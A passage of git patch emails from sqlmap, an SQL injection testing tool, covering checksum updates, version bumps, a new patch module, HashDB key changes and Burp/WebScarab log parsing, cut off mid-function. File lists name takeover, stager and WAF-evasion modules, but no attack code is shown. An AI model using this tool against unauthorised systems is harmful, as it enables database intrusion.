de9922a29c71a235cb95a916ff925db2 lib/core/threads.py c40758411bb0bd68764d78e0bb72bd0f lib/core/unescaper.py @@ -67,9 +67,9 @@ fb2e2f05dde98caeac6ccf3e67192177 lib/parse/configfile.py ec4e56bbb1349176b2a22e0b99ba6a55 lib/parse/payloads.py 492654567e72b6a14584651fcd9f16e6 lib/parse/sitemap.py 30eed3a92a04ed2c29770e1b10d39dc0 lib/request/basicauthhandler.py -62e4500ef19f7795a1443897b535b36d lib/request/basic.py +2b81435f5a7519298c15c724e3194a0d lib/request/basic.py c0cabedead14b8a23353b606672cff42 lib/request/comparison.py -0ad9051e84e8fefe826f1a574b41b1b0 lib/request/connect.py +8500dfaccd8ac4a6eecbca266f6327c9 lib/request/connect.py dd4598675027fae99f2e2475b05986da lib/request/direct.py 2044fce3f4ffa268fcfaaf63241b1e64 lib/request/dns.py 98535d0efca5551e712fcc4b34a3f772 lib/request/httpshandler.py @@ -86,20 +86,20 @@ acc1db3667bf910b809eb279b60595eb lib/takeover/icmpsh.py 46ff5840b29531412bcaa05dac190413 lib/takeover/metasploit.py fb9e34d558293b5d6b9727f440712886 lib/takeover/registry.py 48575dde7bb867b7937769f569a98309 lib/takeover/udf.py -2665fa7eedb19a1b10ffe949999b75f1 lib/takeover/web.py +f6f835e4190a55e42d13c1e7ca3f728f lib/takeover/web.py f1decf0a987bd3a4bc757212cbe6a6c8 lib/takeover/xp_cmdshell.py 4a7f231e597f754e9fcd116d13ad1a4d lib/techniques/blind/inference.py 1e5532ede194ac9c083891c2f02bca93 lib/techniques/blind/__init__.py 1e5532ede194ac9c083891c2f02bca93 lib/techniques/dns/__init__.py 799faf9008527d2e9da9d923e50f685a lib/techniques/dns/test.py -bad83c6386adf345fbc982bdafbe3b93 lib/techniques/dns/use.py +48a24f48da791e67309003fd5e8428cb lib/techniques/dns/use.py 1e5532ede194ac9c083891c2f02bca93 lib/techniques/error/__init__.py f5fb02487edaf9adaa81d54324c84f8f lib/techniques/error/use.py 1e5532ede194ac9c083891c2f02bca93 lib/techniques/__init__.py 1e5532ede194ac9c083891c2f02bca93 lib/techniques/union/__init__.py 94d7a22bb6725a91e84ba2cd9973e96d lib/techniques/union/test.py 11ecf2effbe9f40b361843d546c3c521 lib/techniques/union/use.py -3e404b091e698cceadc1b9d2f1dae4d9 lib/utils/api.py +ecedf10e09525ac4be07bd27cbd31d81 lib/utils/api.py 37dfb641358669f62c2acedff241348b lib/utils/brute.py 31b1e7eb489eac837db6a2bc1dcb7da7 lib/utils/crawler.py de9620f03231d8329ee8434884b6bacd lib/utils/deps.py @@ -116,7 +116,7 @@ cc1cfe36057f1d9bbdcba1bcc03359f9 lib/utils/hash.py 571884f530796534f03c49cf3f380a4c lib/utils/sqlalchemy.py dcc25183c6bd85b172c87cfcbc305ab6 lib/utils/timeout.py fad14adffa8b640a15b06db955031695 lib/utils/versioncheck.py -7348ee704485651737ddbe3538271be9 lib/utils/xrange.py +e9e73cd6bd814dd7823a9da913cea61c lib/utils/xrange.py b9d2761f47fec3d98b88311a263fd5db plugins/dbms/access/connector.py 3f1c50a1507d1c2f69c20c706230e2e2 plugins/dbms/access/enumeration.py fcc66fc377db3681f7890ec55675564b plugins/dbms/access/filesystem.py @@ -225,13 +225,13 @@ ec2ba8c757ac96425dcd2b97970edd3a shell/stagers/stager.asp_ 0c48ddb1feb7e38a951ef05a0d48e032 shell/stagers/stager.jsp_ 2f9e459a4cf6a58680978cdce5ff7971 shell/stagers/stager.php_ 4eaeef94314956e4517e5310a28d579a sqlmapapi.py -5c8583dd47f92935ceb41210a10eeebf sqlmap.py -b2c2cc55ba4e31bea94494dcafe5d8cc tamper/0x2char.py +2cc55aaabe5b5acb29745c3832d16aaa sqlmap.py +1a1e3a78ded58b240c9dbb1b17996acf tamper/0x2char.py 4c3b8a7daa4bff52e01d4168be0eedbe tamper/apostrophemask.py 4115a55b8aba464723d645b7d3156b6e tamper/apostrophenullencode.py d7e9a979eff4d7315d804a181e66fc93 tamper/appendnullbyte.py 0298d81e9dfac7ff18a5236c0f1d84b6 tamper/base64encode.py -4d44f868c6c97ced29e306347ce5d650 tamper/between.py +9a3da4aa7b220448aa3ecbb92f68330f tamper/between.py e1d2329adc6ca89828a2eaec2951806c tamper/bluecoat.py e3cdf13caedb4682bee3ff8fac103606 tamper/chardoubleencode.py 3b2f68476fbcf8223199e8dd4ec14b64 tamper/charencode.py @@ -239,7 +239,7 @@ b502023ac6c48e49e652ba524b8e18cc tamper/charunicodeencode.py 2c2b38974dc773568de7e7d771d7042c tamper/charunicodeescape.py 6a395de07b60f47d9474ace0a98c160f tamper/commalesslimit.py 211bb8fa36a6ecb42b719c951c362851 tamper/commalessmid.py -19acfde79c9a2d8458e15182f5b73d71 tamper/commentbeforeparentheses.py +6082358eb328d1cdd4587e73c95bbefc tamper/commentbeforeparentheses.py 334e4a2485b3a1bbc1734823b93ea694 tamper/concat2concatws.py dcdc433fe946f1b9005bcd427a951dd6 tamper/equaltolike.py 06df880df5d8749963f5562f60fd1637 tamper/escapequotes.py @@ -248,13 +248,13 @@ dcdc433fe946f1b9005bcd427a951dd6 tamper/equaltolike.py 9d8c350cbb90d4b21ec9c9db184a213a tamper/htmlencode.py 3f79551baf811ff70b2ba8795a2064be tamper/ifnull2casewhenisnull.py e2c2b6a67546b36983a72f129a817ec0 tamper/ifnull2ifisnull.py -91c92ee203e7e619cb547643883924ca tamper/informationschemacomment.py +21665e68ef9f91b2395e81d2f341412d tamper/informationschemacomment.py 1e5532ede194ac9c083891c2f02bca93 tamper/__init__.py 2dc49bcd6c55f4e2322b07fa92685356 tamper/least.py 1834b5409c449d2ea1b70a5038fed9eb tamper/lowercase.py de4c83d33968a0cbf00cdfd8d35deddc tamper/modsecurityversioned.py 39981d5d6cb84aca950458739102bb07 tamper/modsecurityzeroversioned.py -b4cadf2ddcdc0598c9a3bf24521a2fa1 tamper/multiplespaces.py +5ee5147612ebe4769a67a8e2305d62f7 tamper/multiplespaces.py be757e4c9a6fb36af7b9a8c444fddb05 tamper/nonrecursivereplacement.py e298e486c06bb39d81f10d61a5c4ceec tamper/overlongutf8more.py b9f698556f8333d9fa6eadaab44a77ab tamper/overlongutf8.py @@ -400,7 +400,7 @@ ef722d062564def381b1f96f5faadee3 waf/baidu.py 6a2834daf767491d3331bd31e946d540 waf/binarysec.py 41e399dbfe7b904d5aacfb37d85e1fbf waf/blockdos.py 2f3bbf43be94d4e9ffe9f80e8483d62f waf/ciscoacexml.py -cf979f0393523c028d8190ef6116884f waf/cloudbric.py +ba84f296cb52f5e78a0670b98d7763fa waf/cloudbric.py 21b8203fdaaaac3cb7c84fa4dc0627f6 waf/cloudflare.py b16b1c15532103346d5e2f5b8bd1ed36 waf/cloudfront.py ac96f34c254951d301973617064eb1b5 waf/comodo.py diff --git a/waf/cloudbric.py b/waf/cloudbric.py index bbe79e5d810..94963232934 100644 --- a/waf/cloudbric.py +++ b/waf/cloudbric.py @@ -5,9 +5,6 @@ See the file 'LICENSE' for copying permission """ -import re - -from lib.core.enums import HTTP_HEADER from lib.core.settings import WAF_ATTACK_VECTORS __product__ = "Cloudbric Web Application Firewall (Cloudbric)" From 6b0633289650b13d3e8b4cb10fb24ddc0342a321 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Tue, 12 Jun 2018 22:45:16 +0200 Subject: [PATCH 167/428] Fixes #3145 --- lib/core/settings.py | 2 +- lib/core/target.py | 2 +- txt/checksum.md5 | 4 ++-- 3 files changed, 4 insertions(+), 4 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 1d86bc30d6f..72907db345b 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.6.16" +VERSION = "1.2.6.17" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/core/target.py b/lib/core/target.py index 8e38389b94e..4ab2e2cca55 100644 --- a/lib/core/target.py +++ b/lib/core/target.py @@ -83,6 +83,7 @@ def _setRequestParams(): conf.parameters[None] = "direct connection" return + hintNames = [] testableParameters = False # Perform checks on GET parameters @@ -101,7 +102,6 @@ def _setRequestParams(): if conf.data is not None: conf.method = HTTPMETHOD.POST if not conf.method or conf.method == HTTPMETHOD.GET else conf.method - hintNames = [] def process(match, repl): retVal = match.group(0) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 84f60fc773b..7ce69f98ec4 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -47,10 +47,10 @@ c9a56e58984420a5abb7a3f7aadc196d lib/core/optiondict.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -c769cdd91e5adaf3c6a1cdfe24b7a544 lib/core/settings.py +8a43d5859fe5a416edcbe75f9570f909 lib/core/settings.py 0dfc2ed40adf72e302291f6ecd4406f6 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py -8f8613d1a960d53655ceee0114e2b206 lib/core/target.py +36bd2dc292c0e10e39bd9c43b77fe1bc lib/core/target.py 72d499ca8d792e90a1ebfb2ad2341a51 lib/core/testing.py de9922a29c71a235cb95a916ff925db2 lib/core/threads.py c40758411bb0bd68764d78e0bb72bd0f lib/core/unescaper.py From 220c1be162eda2066974e74bfb6199e7d0214255 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Tue, 12 Jun 2018 23:02:38 +0200 Subject: [PATCH 168/428] Fixes #3144 --- lib/core/option.py | 12 ------------ lib/core/patch.py | 26 ++++++++++++++++++++++++++ lib/core/settings.py | 2 +- sqlmap.py | 2 ++ txt/checksum.md5 | 7 ++++--- 5 files changed, 33 insertions(+), 16 deletions(-) create mode 100644 lib/core/patch.py diff --git a/lib/core/option.py b/lib/core/option.py index 75bd66eac45..761ac15d522 100644 --- a/lib/core/option.py +++ b/lib/core/option.py @@ -10,7 +10,6 @@ import glob import inspect import logging -import httplib import os import random import re @@ -1816,16 +1815,6 @@ def _cleanupEnvironment(): if hasattr(socket, "_ready"): socket._ready.clear() -def _dirtyPatches(): - """ - Place for "dirty" Python related patches - """ - - httplib._MAXLINE = 1 * 1024 * 1024 # accept overly long result lines (e.g. SQLi results in HTTP header responses) - - if IS_WIN: - from thirdparty.wininetpton import win_inet_pton # add support for inet_pton() on Windows OS - def _purgeOutput(): """ Safely removes (purges) output directory. @@ -2633,7 +2622,6 @@ def init(): _setRequestFromFile() _cleanupOptions() _cleanupEnvironment() - _dirtyPatches() _purgeOutput() _checkDependencies() _createTemporaryDirectory() diff --git a/lib/core/patch.py b/lib/core/patch.py new file mode 100644 index 00000000000..f55ab7b4a7e --- /dev/null +++ b/lib/core/patch.py @@ -0,0 +1,26 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +See the file 'LICENSE' for copying permission +""" + +import codecs +import httplib + +from lib.core.settings import IS_WIN + +def dirtyPatches(): + """ + Place for "dirty" Python related patches + """ + + # accept overly long result lines (e.g. SQLi results in HTTP header responses) + httplib._MAXLINE = 1 * 1024 * 1024 + + # add support for inet_pton() on Windows OS + if IS_WIN: + from thirdparty.wininetpton import win_inet_pton + + # Reference: https://github.com/nodejs/node/issues/12786#issuecomment-298652440 + codecs.register(lambda name: codecs.lookup("utf-8") if name == "cp65001" else None) diff --git a/lib/core/settings.py b/lib/core/settings.py index 72907db345b..b2e11a8d1de 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.6.17" +VERSION = "1.2.6.18" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/sqlmap.py b/sqlmap.py index 618ea99fb79..75272136ead 100755 --- a/sqlmap.py +++ b/sqlmap.py @@ -57,6 +57,7 @@ from lib.core.exception import SqlmapUserQuitException from lib.core.option import initOptions from lib.core.option import init + from lib.core.patch import dirtyPatches from lib.core.settings import GIT_PAGE from lib.core.settings import IS_WIN from lib.core.settings import LEGAL_DISCLAIMER @@ -114,6 +115,7 @@ def main(): """ try: + dirtyPatches() checkEnvironment() setPaths(modulePath()) banner() diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 7ce69f98ec4..8898eb6dfaf 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -41,13 +41,14 @@ cada93357a7321655927fc9625b3bfec lib/core/exception.py 1e5532ede194ac9c083891c2f02bca93 lib/core/__init__.py 458a194764805cd8312c14ecd4be4d1e lib/core/log.py c9a56e58984420a5abb7a3f7aadc196d lib/core/optiondict.py -718646541f2b446f40533149fc0f1b30 lib/core/option.py +332d4bb299a0edbc42100e3cfbead285 lib/core/option.py +c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 7cfd04e583cca782b843f6f6d973981a lib/core/profiling.py 6f654e1715571eff68a0f8af3d62dcf8 lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -8a43d5859fe5a416edcbe75f9570f909 lib/core/settings.py +76cfa95c6b52dbdc3fb5396f8d9d57dc lib/core/settings.py 0dfc2ed40adf72e302291f6ecd4406f6 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 36bd2dc292c0e10e39bd9c43b77fe1bc lib/core/target.py @@ -225,7 +226,7 @@ ec2ba8c757ac96425dcd2b97970edd3a shell/stagers/stager.asp_ 0c48ddb1feb7e38a951ef05a0d48e032 shell/stagers/stager.jsp_ 2f9e459a4cf6a58680978cdce5ff7971 shell/stagers/stager.php_ 4eaeef94314956e4517e5310a28d579a sqlmapapi.py -2cc55aaabe5b5acb29745c3832d16aaa sqlmap.py +c5ecca109867f7ce4d325f487cf7badd sqlmap.py 1a1e3a78ded58b240c9dbb1b17996acf tamper/0x2char.py 4c3b8a7daa4bff52e01d4168be0eedbe tamper/apostrophemask.py 4115a55b8aba464723d645b7d3156b6e tamper/apostrophenullencode.py From 17c170e1f8bc1d46bf370665d2d9275c3cac43b5 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Wed, 13 Jun 2018 23:51:09 +0200 Subject: [PATCH 169/428] Fixes #3148 --- lib/core/common.py | 4 ++-- lib/core/settings.py | 4 ++-- txt/checksum.md5 | 4 ++-- 3 files changed, 6 insertions(+), 6 deletions(-) diff --git a/lib/core/common.py b/lib/core/common.py index 39a7ae92b20..d5416f10220 100644 --- a/lib/core/common.py +++ b/lib/core/common.py @@ -4281,7 +4281,7 @@ def hashDBWrite(key, value, serialize=False): Helper function for writing session data to HashDB """ - _ = "%s%s%s" % (conf.url or "%s%s" % (conf.hostname, conf.port), key, HASHDB_MILESTONE_VALUE) + _ = '|'.join((conf.hostname, conf.path.strip('/') if conf.path is not None else conf.port, key, HASHDB_MILESTONE_VALUE)) conf.hashDB.write(_, value, serialize) def hashDBRetrieve(key, unserialize=False, checkConf=False): @@ -4289,7 +4289,7 @@ def hashDBRetrieve(key, unserialize=False, checkConf=False): Helper function for restoring session data from HashDB """ - _ = "%s%s%s" % (conf.url or "%s%s" % (conf.hostname, conf.port), key, HASHDB_MILESTONE_VALUE) + _ = '|'.join((conf.hostname, conf.path.strip('/') if conf.path is not None else conf.port, key, HASHDB_MILESTONE_VALUE)) retVal = conf.hashDB.retrieve(_, unserialize) if kb.resumeValues and not (checkConf and any((conf.flushSession, conf.freshQueries))) else None if not kb.inferenceMode and not kb.fileReadMode and isinstance(retVal, basestring) and any(_ in retVal for _ in (PARTIAL_VALUE_MARKER, PARTIAL_HEX_VALUE_MARKER)): diff --git a/lib/core/settings.py b/lib/core/settings.py index b2e11a8d1de..fe358ed42c7 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.6.18" +VERSION = "1.2.6.19" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) @@ -598,7 +598,7 @@ HASHDB_END_TRANSACTION_RETRIES = 3 # Unique milestone value used for forced deprecation of old HashDB values (e.g. when changing hash/pickle mechanism) -HASHDB_MILESTONE_VALUE = "dPHoJRQYvs" # python -c 'import random, string; print "".join(random.sample(string.ascii_letters, 10))' +HASHDB_MILESTONE_VALUE = "BZzRotigLX" # python -c 'import random, string; print "".join(random.sample(string.ascii_letters, 10))' # Warn user of possible delay due to large page dump in full UNION query injections LARGE_OUTPUT_THRESHOLD = 1024 ** 2 diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 8898eb6dfaf..3017db45390 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -28,7 +28,7 @@ c7443613a0a2505b1faec931cee2a6ef lib/controller/handler.py 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py 0adf547455a76dc71e6a599e52da1ed9 lib/core/agent.py fd8f239e259afaf5f24bcf34a0ad187f lib/core/bigarray.py -6470770fb1296acb13c3e49a77ee0159 lib/core/common.py +c18e33cda9cab13ee3838e13c713547f lib/core/common.py 0d082da16c388b3445e656e0760fb582 lib/core/convert.py 9f87391b6a3395f7f50830b391264f27 lib/core/data.py 72016ea5c994a711a262fd64572a0fcd lib/core/datatype.py @@ -48,7 +48,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -76cfa95c6b52dbdc3fb5396f8d9d57dc lib/core/settings.py +fb320879e5b086c37527ce8f9ff2d7ce lib/core/settings.py 0dfc2ed40adf72e302291f6ecd4406f6 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 36bd2dc292c0e10e39bd9c43b77fe1bc lib/core/target.py From 756f02fb0e8deb2d7114a46123ec23bed89ffd7d Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Fri, 15 Jun 2018 14:22:24 +0200 Subject: [PATCH 170/428] Fixes #3150 --- lib/core/common.py | 4 ++-- lib/core/settings.py | 2 +- txt/checksum.md5 | 4 ++-- 3 files changed, 5 insertions(+), 5 deletions(-) diff --git a/lib/core/common.py b/lib/core/common.py index d5416f10220..a439ba89618 100644 --- a/lib/core/common.py +++ b/lib/core/common.py @@ -4281,7 +4281,7 @@ def hashDBWrite(key, value, serialize=False): Helper function for writing session data to HashDB """ - _ = '|'.join((conf.hostname, conf.path.strip('/') if conf.path is not None else conf.port, key, HASHDB_MILESTONE_VALUE)) + _ = '|'.join((conf.hostname, conf.path.strip('/') if conf.path is not None else str(conf.port), key, HASHDB_MILESTONE_VALUE)) conf.hashDB.write(_, value, serialize) def hashDBRetrieve(key, unserialize=False, checkConf=False): @@ -4289,7 +4289,7 @@ def hashDBRetrieve(key, unserialize=False, checkConf=False): Helper function for restoring session data from HashDB """ - _ = '|'.join((conf.hostname, conf.path.strip('/') if conf.path is not None else conf.port, key, HASHDB_MILESTONE_VALUE)) + _ = '|'.join((conf.hostname, conf.path.strip('/') if conf.path is not None else str(conf.port), key, HASHDB_MILESTONE_VALUE)) retVal = conf.hashDB.retrieve(_, unserialize) if kb.resumeValues and not (checkConf and any((conf.flushSession, conf.freshQueries))) else None if not kb.inferenceMode and not kb.fileReadMode and isinstance(retVal, basestring) and any(_ in retVal for _ in (PARTIAL_VALUE_MARKER, PARTIAL_HEX_VALUE_MARKER)): diff --git a/lib/core/settings.py b/lib/core/settings.py index fe358ed42c7..7549a082899 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.6.19" +VERSION = "1.2.6.20" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 3017db45390..d631ef2aba4 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -28,7 +28,7 @@ c7443613a0a2505b1faec931cee2a6ef lib/controller/handler.py 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py 0adf547455a76dc71e6a599e52da1ed9 lib/core/agent.py fd8f239e259afaf5f24bcf34a0ad187f lib/core/bigarray.py -c18e33cda9cab13ee3838e13c713547f lib/core/common.py +2dde54b2f690247ee715b2f5cf6c258b lib/core/common.py 0d082da16c388b3445e656e0760fb582 lib/core/convert.py 9f87391b6a3395f7f50830b391264f27 lib/core/data.py 72016ea5c994a711a262fd64572a0fcd lib/core/datatype.py @@ -48,7 +48,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -fb320879e5b086c37527ce8f9ff2d7ce lib/core/settings.py +61b6f5d056e09f542f13a8f75287aac9 lib/core/settings.py 0dfc2ed40adf72e302291f6ecd4406f6 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 36bd2dc292c0e10e39bd9c43b77fe1bc lib/core/target.py From 53578bcb7cea2edd91023785896095f1a3043521 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Tue, 19 Jun 2018 14:56:39 +0200 Subject: [PATCH 171/428] Generic patch related to the #3153 --- lib/core/common.py | 4 ++-- lib/core/settings.py | 2 +- txt/checksum.md5 | 4 ++-- 3 files changed, 5 insertions(+), 5 deletions(-) diff --git a/lib/core/common.py b/lib/core/common.py index a439ba89618..902e840566a 100644 --- a/lib/core/common.py +++ b/lib/core/common.py @@ -4281,7 +4281,7 @@ def hashDBWrite(key, value, serialize=False): Helper function for writing session data to HashDB """ - _ = '|'.join((conf.hostname, conf.path.strip('/') if conf.path is not None else str(conf.port), key, HASHDB_MILESTONE_VALUE)) + _ = '|'.join((str(_) if not isinstance(_, basestring) else _) for _ in (conf.hostname, conf.path.strip('/') if conf.path is not None else conf.port, key, HASHDB_MILESTONE_VALUE)) conf.hashDB.write(_, value, serialize) def hashDBRetrieve(key, unserialize=False, checkConf=False): @@ -4289,7 +4289,7 @@ def hashDBRetrieve(key, unserialize=False, checkConf=False): Helper function for restoring session data from HashDB """ - _ = '|'.join((conf.hostname, conf.path.strip('/') if conf.path is not None else str(conf.port), key, HASHDB_MILESTONE_VALUE)) + _ = '|'.join((str(_) if not isinstance(_, basestring) else _) for _ in (conf.hostname, conf.path.strip('/') if conf.path is not None else conf.port, key, HASHDB_MILESTONE_VALUE)) retVal = conf.hashDB.retrieve(_, unserialize) if kb.resumeValues and not (checkConf and any((conf.flushSession, conf.freshQueries))) else None if not kb.inferenceMode and not kb.fileReadMode and isinstance(retVal, basestring) and any(_ in retVal for _ in (PARTIAL_VALUE_MARKER, PARTIAL_HEX_VALUE_MARKER)): diff --git a/lib/core/settings.py b/lib/core/settings.py index 7549a082899..11b898332be 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.6.20" +VERSION = "1.2.6.21" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index d631ef2aba4..e1c5360a167 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -28,7 +28,7 @@ c7443613a0a2505b1faec931cee2a6ef lib/controller/handler.py 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py 0adf547455a76dc71e6a599e52da1ed9 lib/core/agent.py fd8f239e259afaf5f24bcf34a0ad187f lib/core/bigarray.py -2dde54b2f690247ee715b2f5cf6c258b lib/core/common.py +5fb7d0339b64859c6d2bac3341ce496c lib/core/common.py 0d082da16c388b3445e656e0760fb582 lib/core/convert.py 9f87391b6a3395f7f50830b391264f27 lib/core/data.py 72016ea5c994a711a262fd64572a0fcd lib/core/datatype.py @@ -48,7 +48,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -61b6f5d056e09f542f13a8f75287aac9 lib/core/settings.py +070499b0c66d5dd7c95dd75ba7d5abe6 lib/core/settings.py 0dfc2ed40adf72e302291f6ecd4406f6 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 36bd2dc292c0e10e39bd9c43b77fe1bc lib/core/target.py From 961d2b24d16f9902c9b2ffe8e78dd248fc418908 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Tue, 19 Jun 2018 16:08:38 +0200 Subject: [PATCH 172/428] First commit regarding #739 --- lib/core/common.py | 195 +++++++++++++++++++++++++++++++++++++ lib/core/option.py | 224 ++++--------------------------------------- lib/core/settings.py | 2 +- txt/checksum.md5 | 6 +- 4 files changed, 217 insertions(+), 210 deletions(-) diff --git a/lib/core/common.py b/lib/core/common.py index 902e840566a..8b1192d94e8 100644 --- a/lib/core/common.py +++ b/lib/core/common.py @@ -5,6 +5,7 @@ See the file 'LICENSE' for copying permission """ +import binascii import codecs import contextlib import cookielib @@ -101,7 +102,10 @@ from lib.core.settings import BRUTE_DOC_ROOT_PREFIXES from lib.core.settings import BRUTE_DOC_ROOT_SUFFIXES from lib.core.settings import BRUTE_DOC_ROOT_TARGET_MARK +from lib.core.settings import BURP_REQUEST_REGEX +from lib.core.settings import BURP_XML_HISTORY_REGEX from lib.core.settings import DBMS_DIRECTORY_DICT +from lib.core.settings import CRAWL_EXCLUDE_EXTENSIONS from lib.core.settings import CUSTOM_INJECTION_MARK_CHAR from lib.core.settings import DEFAULT_COOKIE_DELIMITER from lib.core.settings import DEFAULT_GET_POST_DELIMITER @@ -139,6 +143,7 @@ from lib.core.settings import PAYLOAD_DELIMITER from lib.core.settings import PLATFORM from lib.core.settings import PRINTABLE_CHAR_REGEX +from lib.core.settings import PROBLEMATIC_CUSTOM_INJECTION_PATTERNS from lib.core.settings import PUSH_VALUE_EXCEPTION_RETRY_COUNT from lib.core.settings import PYVERSION from lib.core.settings import REFERER_ALIASES @@ -161,6 +166,7 @@ from lib.core.settings import URLENCODE_FAILSAFE_CHARS from lib.core.settings import USER_AGENT_ALIASES from lib.core.settings import VERSION_STRING +from lib.core.settings import WEBSCARAB_SPLITTER from lib.core.threads import getCurrentThreadData from lib.utils.sqlalchemy import _sqlalchemy from thirdparty.clientform.clientform import ParseResponse @@ -4468,6 +4474,195 @@ def pollProcess(process, suppress_errors=False): break +def parseRequestFile(reqFile): + """ + Parses WebScarab and Burp logs and adds results to the target URL list + """ + + def _parseWebScarabLog(content): + """ + Parses WebScarab logs (POST method not supported) + """ + + reqResList = content.split(WEBSCARAB_SPLITTER) + + for request in reqResList: + url = extractRegexResult(r"URL: (?P.+?)\n", request, re.I) + method = extractRegexResult(r"METHOD: (?P.+?)\n", request, re.I) + cookie = extractRegexResult(r"COOKIE: (?P.+?)\n", request, re.I) + + if not method or not url: + logger.debug("not a valid WebScarab log data") + continue + + if method.upper() == HTTPMETHOD.POST: + warnMsg = "POST requests from WebScarab logs aren't supported " + warnMsg += "as their body content is stored in separate files. " + warnMsg += "Nevertheless you can use -r to load them individually." + logger.warning(warnMsg) + continue + + if not(conf.scope and not re.search(conf.scope, url, re.I)): + yield (url, method, None, cookie, None) + + def _parseBurpLog(content): + """ + Parses Burp logs + """ + + if not re.search(BURP_REQUEST_REGEX, content, re.I | re.S): + if re.search(BURP_XML_HISTORY_REGEX, content, re.I | re.S): + reqResList = [] + for match in re.finditer(BURP_XML_HISTORY_REGEX, content, re.I | re.S): + port, request = match.groups() + try: + request = request.decode("base64") + except binascii.Error: + continue + _ = re.search(r"%s:.+" % re.escape(HTTP_HEADER.HOST), request) + if _: + host = _.group(0).strip() + if not re.search(r":\d+\Z", host): + request = request.replace(host, "%s:%d" % (host, int(port))) + reqResList.append(request) + else: + reqResList = [content] + else: + reqResList = re.finditer(BURP_REQUEST_REGEX, content, re.I | re.S) + + for match in reqResList: + request = match if isinstance(match, basestring) else match.group(0) + request = re.sub(r"\A[^\w]+", "", request) + + schemePort = 